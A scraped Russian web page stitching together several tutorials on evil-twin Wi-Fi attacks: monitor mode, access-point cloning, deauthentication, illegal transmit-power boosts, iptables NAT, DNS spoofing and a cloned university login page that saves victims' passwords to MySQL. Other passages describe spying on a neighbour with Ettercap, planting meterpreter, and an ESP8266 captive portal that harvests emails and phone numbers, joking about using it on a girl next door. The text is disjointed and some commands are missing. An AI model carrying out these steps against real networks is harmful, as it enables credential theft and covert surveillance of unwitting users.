63 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Поддельная точка доступа wifi через dnsmasq

Поддельная точка доступа wifi через dnsmasq .

Поддельная точка доступа wifi через dnsmasq и Burp Suite .

Продолжим начатое в предыдущей статье о настройке dnsmasq – без проведённых там настроек в этой статье делать нечего. Сервер настроен, условия, перечисленные в статье, выполнены. Если всё прошло без эксцессов, поддельная точка доступа готова к запуску.

Переводим свободный модем (она же альфа-карта) в режим мониторинга командой в терминале (повторяю – имена интерфейсов у вас могут быть другими):

Мне всегда мешают сразу несколько процессов:

kill номер-процесса

я остановлю лишь менеджер подключений, этого зачастую достаточно для успеха. У меня NetworkManager запущен под номером 1486. И вот, после остановки, повторим команду, и модем в режиме мониторинга с изменённым именем интерфейса:

Теперь запускаем трансляцию сигнала командой:

где, Test – название поддельной точки (можно назвать более привлекательно, типа McDonalds, SushiBar и AutoService и т.п. – потом просто посмотрите по сторонам, что рядом будет с подходящим названием, то и подделаете); – с 6 – трансляция будет идти на 6 канале; wlan0mon – интерфейс альфа-модема.

Окно терминала не закрываем, а откроем новое и введём последовательно команды как на фото моего терминала:

Поддельная точка доступа . Что команды означают?

  • Прописанной в файле конфигурации сервера точке доступа с интерфейсом at0 присвоен IP-адрес 192.168.1.1
  • dnsmasq – запущена программа-сервер
  • Следующими командами мы настраиваем фаервол на исходящие соединения. Иначе клиенты жертв не смогут попасть в сеть и очень скоро перейдут на ближайшее, более качественное соединение, минуя ваше. Eth1 – это интерфейс выхода в сеть самого хакера.
  • команда с echo пропишет в ядре правило на форвардинг пакетов и превратит компьютер хакера в роутер
  • dnsspoof -i at0 – направит запросы DNS сервера жертвы на at0 – она и есть поддельная точка доступа хакера.

Нам осталось запустить имеющийся в составе Кали Линукс пакет Burp Suite. В терминале наберите:

burpsuite

Пройдите на вкладку Proxy и выберите кнопку Options. Добавьте два рабочих порта для интернет-протоколов: работать будем, конечно же, 80-й и 443-й. То есть нажмите на кнопку Add и во вкладке Binding введите сначала 80, а в ниспадающем списке Spicific address выберите IP-адрес поддельной точки at0 (у меня 192.168.1.1). В следующей вкладке Request Handling установите флажок на Support invisible proxying. Ту же операцию повторите с портом 443.

Время попробовать подключить устройства (вы же на своих компьютерах и смартфонах тренировались?) и посмотреть, как это выглядит наглядно .

Поддельная точка доступа готова к использованию. Хакер теперь может видеть всё, что отсылает жертва. В следующей статье будем анализировать и понимать, что происходит на экране компьютера жертвы и хакера.

Статья Создание поддельной точки доступа для перехвата данных Wi Fi

Перейти к странице

Sergei webware

Well-known member

Теперь, когда мы познакомились с технологиями, терминологией и набором инструментов aircrack-ng, можно наконец приступать к взлому Wi-Fi.

Нашей первой задачей станет создание поддельной точки доступа. Многие начинающие хакеры сразу же хотят взламывать пароли к Wi-Fi, чтобы бесплатно сидеть в интернете (не беспокойтесь, мы дойдём и до этого), но есть множество других, гораздо более полезных возможностей, сопровождающихся большим риском. Например перехват данных wi fi.

Что такое поддельная точка доступа ?

Поддельная или мошенническая точка доступа – это такая точка, которая ведёт себя точно так же как настоящая, и заставляет конечного пользователя к себе подключиться. В нашем наборе aircrack-ng есть инструмент под названием airbase-ng, который можно использовать для превращения своего беспроводного адаптера в точку доступа. Это мощный взлом клиентской стороны, позволяющий вам видеть весь трафик и проводить атаку посредника.

Что мы будем делать

В данном сценарии мы возьмём на себя роль частного детектива. Клиент попросил нас расследовать возможность того, что его сосед скачивает и продаёт детскую порнографию. Мы должны выяснить, действительно ли это так, а затем собрать доказательства против него.

Шаг 1: Запустите Airmon-Ng

Во-первых, нам нужно проверить, работает ли наша беспроводная карта.

Как видите, наша беспроводная карта вполне функциональна и получила название wlan0. Следующий шаг – переключить беспроводную карту в режим мониторинга, так же называющийся смешанным режимом. Для этого выполните следующую команду:

airmon-ng старт wlan0

Airmon-ng переключил нашу карту в режим мониторинга и сменил её имя на mon0. Теперь наша карта способна принимать любой беспроводной трафик.

Шаг 2: Запустите Airdump-Ng

Далее нам необходимо начать перехват трафика с помощью своей беспроводной карты. Чтобы сделать это, введите:

Мы видим все беспроводные точки доступа в пределах своей области действия, а так же их важную статистику. Сосед, подозреваемый в загрузке и продаже детской порнографии, пользуется точкой доступа с SSID «Elroy».

Если мы всё сделаем правильно, то сможем клонировать его точку доступа и заставить его подключиться к нашей мошеннической беспроводной точке доступа. После этого мы получим возможность следить за всем его трафиком и вставлять собственные пакеты/сообщения/код в его компьютер.

Шаг 3: Дождитесь подключения подозреваемого к точке доступа

Теперь нам осталось только ждать, пока подозреваемый не подключится к своей точке доступа. Как только это произойдёт, вы увидите соответствующее сообщение в нижней части экрана airodump-ng.

Шаг 4: Создайте новую точку доступа с таким же SSID и MAC адресом

После того, как подозреваемый подключается к своей точке доступа, мы можем использовать airbase-ng для создания поддельной точки доступа. Откройте новое окно терминала и введите:

Создайте новую точку доступа с таким же SSID и MAC адресом

Шаг 5: Деаутентификация или отключение от точки доступа

Теперь нам нужно отключить «соседа» от его точки доступа. В стандарте 802.11 есть специальный кадр под названием деаутентификация, который, как и следовало ожидать, выкидывает всех с точки доступа. Когда его компьютер попытается совершить повторный вход, он подключиться к точке доступа с ESSID «Elroy», имеющей самый сильный сигнал.

Для этого мы можем воспользоваться aireplay-ng с пакетом deauth:

Заметьте, что мы вновь использовали его BSSID в команде aireplay-ng. Если наш сигнал мощнее сигнала его собственной точки доступа, подозреваемый автоматически подключится к нашей поддельной сети !

Шаг 6: Увеличение мощности поддельной точки

Одним из важнейших аспектов взлома с использованием этого метода является то, что сигнал поддельной точки доступа должен быть мощнее сигнала оригинальной точки. При отсутствии физического доступа, это может стать критической уязвимостью. В аэропортах и других публичных местах никакой проблемы нет, но в данном сценарии у нас нет физического доступа и очень вероятно, что его точка находится ближе и транслирует более мощный сигнал, чем наша. Но не отчаивайтесь!

Во-первых, мы можем увеличить мощность собственной точки доступа. Это может сработать, поскольку большинство точек доступа автоматически снижают мощность своего сигнала до минимального значения, достаточного для поддержания подключений клиентов. Чтобы поднять мощность своей точки до максимума, введите:

Читать еще:  Редактировать ini файлы. Выбор операционной системы по умолчанию

После выполнения этой команды, мощность нашей точки доступа вплотную приблизится к разрешённому в Соединённых Штатах пределу, составляющему 27 дБм или 500 милливатт.

В некоторых случаях, даже увеличения мощности до 500 мВт может оказаться недостаточно. Если мы попытаемся поднять мощность сигнала нашей беспроводной карты Alfa до максимально возможных 1000 мВт или 30 дБм, то получим сообщение об ошибке, которое вы можете видеть на скриншоте ниже (некоторые из новых карт способны передавать сигнал мощностью до 2000 мВт, что в четыре раза выше разрешённого в США лимита).

Увеличение мощности точки доступа

Примечание: Наш следующий шаг является незаконным в США, поэтому действуйте осторожно, если, конечно, не обладаете особым разрешением или не являетесь работником правоохранительных органов.

В каждой стране есть собственные законы, регулирующие Wi-Fi. Некоторые государства разрешают использовать больше каналов и сигналы большей мощности, чем США. К примеру, Боливия позволяет использовать 12 каналов и 1000 мВт мощности. Чтобы наша карта перешла на боливийские ограничения, просто введите:

iwconfig wlan0 txpower 30

Проверьте выходную мощность командой:

Увеличить мощность собственной точки доступа

Судя по окончанию второй строки, мощность нашего сигнала теперь составляет 30 дБм или 1000 мВт. Этого достаточно, чтобы перебороть любую местную точку доступа, даже на расстоянии нескольких домов!

Поддельная точка доступа работает

Теперь, когда сосед подключился к нашей точке доступа, мы может заняться анализом его деятельности.

К примеру, мы можем воспользоваться приложением вроде Ettercap для совершения атаки посредника. Благодаря этому, мы получим возможность перехватывать и анализировать его трафик и даже отправлять собственный трафик в его компьютер. Другими словами, из-за того, что он подключился к нашей точке доступа, мы получили полный контроль над всеми входящим и исходящим данными. Если он действительно загружает детское порно, мы это увидим.

Кроме этого, мы сможем перехватывать электронные письма и пароли к другим приложениям и сетям. При желании, мы даже можем внедрить в его систему meterpreter или другое приложение для прослушки, если хотим получить больше информации.

Оставайтесь на связи.

В скором времени я опубликую новые интересные статьи, так что не забывайте иногда заходите в наш раздел, посвящённый взлому Wi-Fi ! Если у вас возникли какие-то вопросы, задавайте их в комментариях к данной публикации или пишите на наш форум.

Как создать поддельную точку доступа ROGUE AP

В данной статье мы поговорим про создание поддельной точки доступа. В рамках тестирования на проникновение возникает очень много вариантов использования поддельной точки доступа (Rogue AP, Fake AP) и они относятся в основном к реализации MitM атак посредством Fake AP.

Создаем открытую безпарольную точку доступа с названием копирующем известную сети или закрытую точку с таким же типом шифрования и паролем (предварительно перехваченным и расшифрованным с оригинальной точки доступа, как это сделать — рассказывается в статьях Взлом Wi-Fi с шифрованием WPA/WPA2 PSK и Reaver. Взлом Wi-Fi со включенным WPS) и далее ждем подключившихся клиентов. После чего каким либо способом, коих очень много, анализируем проходящий через нас трафик, либо выдаем какие-либо фишинговые сайты с запросом паролей.

Для создания нам потребуется Linux (я использовал Raspbian и микрокомпьютер Raspberry Pi для создания Rogue AP)

Для начала проверим, что наша карточка поддерживает режим точки доступа (AP), для этого посмотрим вывод утилиты iw:

в списке поддерживаемых режимов должно присутствовать AP.

Установим hostapd — программная точка доступа:

раскомментируем ее и укажем где находится файл конфигурации (у нас это будет /etc/hostapd/hostapd.conf).

и изменим его, прописав параметры нашей сети.

Для безпарольной точки доступа будет достаточно написать:

interface — интерфейс, на котором будет работать точка доступа;
driver — используемый драйвер (обычно nl80211);
ssidSSID имя точки доступа;
channel — канал, на котором будет работать точка доступа;
hw_mode — режим работы (a802.11a, b802.11b,g802.11g), g означает режим работы 802.11b/g.

Для точки доступа с шифрованием WPA2 конфигурация будет немного сложнее:

auth_algs — алгоритм аутентификации (1WPA2, 2WEP, 3 — любой);
wpa — тип шифрования WPA (1WPA, 2WPA2, 3WPA/WPA2);
wpa_passphrase — пароль точки доступа;
wpa_key_mgmt — алгоритм ключей шифрования (может быть WPA-PSKPreSharedKey или WPA-EAP — проверка по протоколу EAP внешним сервером);
wpa_pairwise и rsn_pairwise — какие шифры можно использовать для шифрования передаваемых данных (можно использовать CCMP, TKIP или любой, на выбор клиента).

так же можно использовать дополнительные параметры:

ap_isolate=1 — включить изоляцию клиентов;
bridge=имя_интерфеса — использовать мост.

Теперь нужно настроить получение адресов и маршрутизацию трафика.

Первым делом назначим IP-адрес Wi-Fi адаптеру. Для этого откроем файл /etc/network/interfaces и запишем в него конфигурацию сети для беспроводного адаптера wlan0:

по аналогии настроим и сетевой адаптер, который будет смотреть в интернет (либо если адрес получается по DHCP, то настроим автоматическое получение адреса, как это сделать — описывается в статье Debian, Ubuntu, Raspbian. Базовая настройка IPv4 на сетевых Ethernet интерфейсах)

Далее настроим DNS и выдачу адресов по DHCP, в данном случае воспользуемся утилитой dnsmasq, которая умеет и то и то.

Установим dnsmasq:

откроем конфигурационный файл /etc/dnsmasq.conf и изменим (или добавим) в нем строки:

interface — интерфейс на котором будут работать DHCP и DNS;
dhcp-authoritative — указываем, что наш сервер главный в сети;
dhcp-range — диапазон адресов, параметры указываются через запятую (начало_диапазона,конец_диапазона,время_аренды_адреса);
dhcp-option — параметры DHCP, задаются через запятую в формате (номер_опции,значение,значение)
dhcp-option=1 — маска сети;
dhcp-option=3 — шлюз;
dhcp-option=6DNS сервера;
domain — префикс локального домена;
address — вручную назначаемые DNS записи, сначала проверяется данный список, а потом уже все остальные (идеально подходит для подмены адресов).

Теперь разрешим пересылку пакетов (форвардинг):

Примечание: данный метод работает до перезагрузки. Как включить постоянную пересылку пакетов — рассказывается в статье Обход HTTPS с помощью SSLSTRIP.

Примечание: iptables так же сохраняет правила до перезагрузки, поэтому для автостарта их нужно отдельно сохранить и восстановить после перезагрузки, как это сделать — рассказывается в статье Обход HTTPS с помощью SSLSTRIP.

перезапускаем сервисы dnsmasq и hostapd:

ждем подключившихся клиентов.

Список выданных адресов можно посмотреть командой:

cryptoworld

Специалист в области кибер-безопасности. Работал в ведущих компаниях занимающихся защитой и аналитикой компьютерных угроз. Цель данного блога – простым языком рассказать о сложных моментах защиты IT инфраструктур и сетей.

Волк в овечьей шкуре. Создаем поддельную точку доступа на ESP8266 для сбора паролей

Содержание статьи

Уже давно не секрет (по крайней мере для знающих людей), что операторы открытых сетей с доступом к интернету могут легко перехватывать весь идущий через них трафик и получать таким образом различную информацию, в том числе что вы ищете и какие ресурсы посещаете. Хорошо, если ее просто передадут рекламодателям, чтобы изучать спрос на товары и услуги, и этим все ограничится, но это далеко не все опасности, подстерегающие охочих до халявы владельцев электронных девайсов. Что же еще не так?

Читать еще:  Как посмотреть какая видеокарта стоит на компьютере с Windows 7/10

Недавно в РФ был принят закон, призванный обезопасить открытые точки доступа в общественных местах через обязательную авторизацию с помощью мобильного телефона или социальных сетей. Но, как часто бывает, «что-то пошло не так» и благое, казалось бы, дело обернулось появлением новых уязвимостей, играющих на тонкостях души человеческой. В итоге родился небольшой проект, который в полной мере демонстрирует безграничную легковерность подавляющего большинства представителей Homo Sapiens. Итак, обо всем по порядку.

WARNING

Что за зверь такой?

Зверя изобрели и воплотили в железе наши китайские коллеги. Точнее, они построили скелет самого хищного зверя, которого мы будем одевать в овечью шкуру. Имя ему — контроллер ESP8266, неоднократно упоминавшийся на страницах «Хакера» и GitHub. В нашем проекте мы будем использовать его в качестве автономной точки доступа и веб-сервера. Девайс поднимет точку доступа с именем Free_Wifi, не содержащую пароля, при этом большая часть смартфонов и прочих девайсов будет присылать своим владельцам уведомление с предложением подключиться к открытой сети Wi-Fi, даже если они не просматривали список доступных сетей. Это проверено на Android 9 и iOS последней версии. Итак, доверчивый юзер, не особо полагаясь на интуицию и здравый смысл, нажимает на выпадающее уведомление с весьма заманчивым предложением и попадает на страницу регистрации (при этом не нужно открывать браузер). На экране появится вот такое окно.

Страница авторизации в открытой сети

Здесь мы видим стандартную страничку приветствия открытых точек доступа, предлагающую авторизоваться с помощью электронной почты, пароля и номера телефона либо сразу ввести код авторизации, если он есть. Жертва (как правило, не задумываясь) вводит данные, после чего получает уведомление, что нужно подождать SMS-сообщение с кодом авторизации, а все введенные жертвой данные благополучно сливаются на SD-карту устройства, одновременно отображаясь на OLED-дисплее.

Так выглядят перехваченные данные

Итак, наше устройство работает в режиме фейковой точки доступа, которая имеет привлекательное название и вынуждает расположенные поблизости девайсы обращать внимание на приглашение подключиться, но на самом деле просто сливает учетные данные пользователей.

И что дальше?

А вот дальше начинается самое интересное. В самом простом случае у нас окажется предположительно действующий адрес электронной почты и номер телефона. В лучшем случае мы получим бонусом некий пароль — возможно, один из тех, которыми пользуется данный человек.

Часто ли ты используешь разные пароли для разных сервисов? Вопрос, скорее всего, риторический. Но, даже не имея действительного пароля, можно уже сделать выводы о предпочтениях и уровне осведомленности человека. А адрес электронной почты и номер телефона — это уже хоть какая-то информация, способная сыграть большую роль в дальнейших атаках. Тут на что фантазии хватит: от рассылки писем и SMS с рекламой находящихся поблизости заведений до взлома почты, социальных сетей и деанонимизации человека. Как минимум этот метод позволит узнать номерок и мыло понравившейся девчонки из соседнего подъезда.

В общем, мы наглядно убедились, что открытые сети могут быть весьма небезопасны.

Рождение зверя

Как я уже говорил, использовать мы будем ESP8266 NodeMCU либо ESP32 (для 32 придется подкорректировать код), эти контроллеры работают идентично. Вооружаемся паяльником, макетной платкой, инструментами. Также в нашем устройстве применяется адаптер microSD-карты и OLED-дисплей размером 128 на 32 пикселя с контроллером SSD1306 и интерфейсом i2C. Еще нам понадобится зуммер (динамик-пищалка от старого системника). Так, все приготовили. Берем схему, которая показана на следующей картинке, и приступаем к сборке зверюги. Можно паять, можно соединить просто на макетной плате, суть от этого не изменится.

Продолжение доступно только участникам

Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте

Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», увеличит личную накопительную скидку и позволит накапливать профессиональный рейтинг Xakep Score! Подробнее

Поддельная точка доступа wifi через dnsmasq

ПРОЕКТЫ:

Ссылки:

Останні статті за темою:

Серфінг в Інтернеті з простим браузером – це вже в 1995 році. Сьогодні всі вони з розширеннями! Додатки для браузера підвищують функціональність Chrom …

Віртуальна приватна мережа, або VPN (Virtual Private Network), є важливою частиною онлайн-безпеки та конфіденційності. Якщо коротко, то коли ви вже не …

Pivoting відноситься до методу, який дозволяє тестерам на проникнення використовувати скомпрометовані системи для атак на інші системи в тій же мережі …

Якщо ви думали про Tor, щоб анонімізувати весь свій веб-серфінг, то можете просто завантажити браузер, але набагато більше задоволення зробити свій вл …

Залишається все менше життєздатних варіантів для тестів на проникнення за допомогою таких інструментів, як Reaver, бо інтернет-провайдери замінити вра …

Попередні статті за темою:

Рассмотрим aircrack-ng – лучшее программное обеспечение в мире для взлома Wi-Fi, и начнем с некоторых основ о том, что включено и как все это использо …

В последние недели откровение, что АНБ (NSA) шпионило за всеми нами, дало многим людям оружие в руки.

There are no translations available. З триваючими одкровеннями про масштаби спостереження Агентством національної безпеки за телефонними та інтернет …

АНБ (и кто знает, кто еще) имеет привычку просматривать наши частные письма, о чем мы теперь знаем. Итак, пришло время освежить знания электронной без …

Как выполняется атака Evil Twin? (dnsmasq + aircrack-ng метод)

Чтобы узнать что такое Evil Twin атака, прочитайте статью про эту атаку.

Все следующие команды выполняются в терминале Kali Linux. Если вы хотите выполнить их на другом дистрибутиве Linux, то установите предварительно необходимые пакеты (aircrack-ng и прочие).

Оглавление

Подготовка к атаке и сканирование точек доступа

Обновим список репозиториев и установим dnsmasq:
apt udpate
apt install dnsmasq

Проверяем наличие wifi адаптера:
iwconfig

Для запуска airmon-ng следует завершить процессы, препятствующие его запуску:
airmon-ng check kill

Переводим wifi адаптер wlan0 в режим монитора wlan0mon:
airmon-ng start wlan0

Начинаем прослушку с wlan0mon:
airodump-ng wlan0mon

Нас интересует точка доступа с essid = «kes» (Это моя тестовая точка доступа).

Завершаем прослушку после обнаружения нужной точки доступа:
Ctrl+C

В первой строке верхней таблицы видим информацию о целевой точке доступа. Запомним её:

Настройка и запуск поддельной точки доступа

Изменяем mac адрес адаптера с помощью macchanger на адрес целевой точки доступа.

Читать еще:  Черная тема в проводнике windows 10. Установка через Центр обновления Windows

ifconfig wlan0mon down

macchanger -m 90:94:E4:33:B7:9A

ifconfig wlan0mon up

macchanger -s wlan0mon

Создаём поддельную точку доступа без пароля с таким же essid как у целевой:
airbase-ng -essid “kes” -c 11 wlan0mon

По умолчанию airbase-ng создает интерфейс ответвления (at0) в качестве проводного интерфейса для соединения/маршрутизации сетевого трафика через поддельную точку доступа. Мы можем увидеть это с помощью команды
ifconfig at0

Чтобы at0 выделил IP-адрес, нам нужно сначала присвоить диапазон IP-адресов себе.

Выделить IP и маску подсети:
ifconfig at0 10.0.0.1 up

IP-адрес класса A, 10.0.0.1, соответствует параметру dhcp-option файла dnsmasq.conf. Это означает, что at0 будет действовать как шлюз по умолчанию в dnsmasq.

Теперь мы будем использовать наш стандартный интерфейс с выходом в Интернет, eth0 (или любой другой, с доступом в Интернет), для маршрутизации всего трафика от клиента через него.

Другими словами, мы предоставляем жертве доступ к Интернету и позволяем себе (атакующему) прослушивать этот трафик.

Для этого мы будем использовать утилиту iptables, чтобы установить правило брандмауэра для маршрутизации всего трафика исключительно через at0.

Введите следующие команды для настройки фактического NAT (Network Address Translation — преобразование сетевых адресов):

iptables –flush

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables –append FORWARD –in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination 10.0.0.1:80

iptables -t nat -A POSTROUTING -j MASQUERADE

Нужно убедиться, что мы ввели правильный интерфейс для –out-interface. eth0 здесь — это проводной интерфейс, куда мы хотим отправлять пакеты, поступающие с интерфейса at0 (поддельная точка доступа). Можно выбрать другой интерфейс с доступом к Интернету.

После ввода вышеуказанных команд, если вы хотите предоставить жертве доступ к Интернету, просто включите маршрутизацию, используя команду ниже.

Ввод «1» в файл ip_forward скажет системе включить правила, определенные в iptables, и начать пересылку трафика (если есть). «0» означает отключение. Правила останутся определенными до следующей перезагрузки.

Включить переадресацию IP (предоставить жертве доступ в Интернет):
echo 1 > /proc/sys/net/ipv4/ip_forward

Теперь мы запустим сервер dhcp, чтобы позволить поддельной точке доступа назначать клиентам IP-адреса.

Во-первых, нам нужно сообщить серверу dhcp местоположение файла конфигурации, который определяет класс IP, маску подсети и диапазон сети.

Запустить dhcpd Listener:
dnsmasq -C

/Desktop/dnsmasq.conf -d
Здесь за -C следует путь к файлу конфигурации, а -d обозначает режим демона (то есть запуск в фоне)

Как только жертва подключится к поддельной точке доступа, мы должны увидеть похожий вывод для dnsmasq в терминале:

Если вы столкнулись с какой-либо проблемой, касающейся DHCP-сервера, просто убейте запущенные в данный момент процессы DHCP командой
killall dnsmasq dhcpd isc-dhcp-server
И снова запустите dnsmasq (dhcpd Listener). Это должно сработать.

У нас есть готовая точка доступа Evil Twin, и она отлично работает. Теперь нам нужно настроить нашу поддельную веб-страницу, чтобы жертва увидела её во время просмотра и ввела кодовую фразу, которую использует для своей точки доступа (аккаунта vk, facebook, fefu).

Создание БД и поддельной страницы авторизации

Запускаем сервер apache и MySQL:
/etc/init.d/apache2 start
/etc/init.d/mysql start

Теперь, чтобы сохранить учетные данные, введенные жертвой на HTML-странице, которую мы создадим позже, нам нужна база данных SQL (MySQL).

Настраиваем MySQL:
mysql -u root -p

Необходимо создать нового пользователя FakeAccessPoint с логином fakeap и паролем fakeap (например). Это необходимо так как вы не можете выполнять запросы MySQL из PHP, будучи пользователем root, начиная с версии 5.7.
create user fakeap@localhost identified by ‘fakeap’;

Теперь создаём базу данных и таблицу:
create database rogue_AP;
use rogue_AP;
create table fefu_accounts(login varchar(32), password varchar(32));

Предоставляем пользователю fakeap все права для базы данных rogue_AP:
grant all privileges on rogue_AP.* to ‘fakeap’@’localhost’;

Входим в MySQL как пользователь fakeap:
mysql -u fakeap -p

Выбираем базу данных rogue_AP:
use rogue_AP;

Заносим тестовые данные в эту таблицу и проверяем:
insert into fefu_accounts(login, password) values (“testlogin”, “testpass”);
select * from fefu_accounts;

Теперь напишем php-скрипт dbconnect.php, который будет вносить введённые на странице данные в базу данных:

Теперь приступим к созданию html-страницы ложной авторизации.

В данном примере мы будем копировать страницу авторизации ДВФУ. Оригинальный html-код этой страницы (и изменённый) приложен к статье. Мы будем немного его изменять.

Поменяем body оригинального html-кода на более подходящий, который будет согласоваться с dbconnect.php:

Файлы dbconnect.php, index.html и те, от которых они зависят, копируем в /var/www/html/

Deauth атака

Всё готово для атаки Evil Twin, однако нам нужно подождать, пока клиент подключится, и увидеть введённые им учётные данные.

Клиент может быть уже подключён к точке доступа. Нам необходимо принудительно отключить его с помощью утилиты aireplay-ng.

Это называется атакой деаутентификации. Атакующий отправляет deauth пакеты с BSSID точки доступа в эфир, сообщая каждому клиенту об отмене аутентификации. Подключенные клиенты исполняют команду деаутентификации и отключаются от точки доступа.

Атака также может быть направлена на определённые MAC-адреса целей с дополнительным параметром -c в командной строке.

Начинаем посылать deauth пакеты ко всем клиентам нужной точки доступа:
aireplay-ng –deauth 0 -a 90:94:E4:33:B7:9A wlan0mon

«– deauth 0 -a» означает, что мы будем непрерывно отправлять deauth пакеты.

Мы используем 0, чтобы каждый клиент отключился от этого конкретной точки доступа с указанным BSSID и подключился к нашей точке доступа, так как она имеет то же имя, что и реальная точка доступа, а также она открыта (не требует пароля для подключения).

Во время такой атаки клиент получит ошибку от настоящей точки доступа:

Как только клиент отключится от целевой и подключится к поддельной точке доступа, мы увидим активность airbase-ng в терминале, как здесь:

Жертва подключилась к поддельной точке доступа.

Сейчас мы можем сделать две вещи:

  1. Просмотреть трафик клиента
  2. Перенаправить весь его трафик на страницу поддельной точки доступа (ввод пароля)

Давайте перенаправим клиента на страницу ввода пароля:
dnsspoof -i at0
Эта команда перенаправит весь HTTP-трафик от интерфейса at0. Не получится перенаправить HTTPS-трафик, из-за встроенного списка веб-сайтов HSTS. Если попытаться это сделать, то на компьютере жертвы будет ошибка.

Когда жертва попытается получить доступ к какому-либо веб-сайту (в данном случае http://evil.com), она увидит страницу, которая потребует от жертвы ввести логин и пароль от аккаунта ДВФУ.

Как только жертва нажмет [Enter], она увидит это:

Теперь возвращаемся на сторону атакующего. Мы должны проверить в базе данных MySQL сохранённые пароли.

Подключаемся к БД (если не подключены уже) и вводим следующую команду в терминале MySQL:
select * from fefu_accounts;

голоса
Рейтинг статьи
Ссылка на основную публикацию
Статьи c упоминанием слов: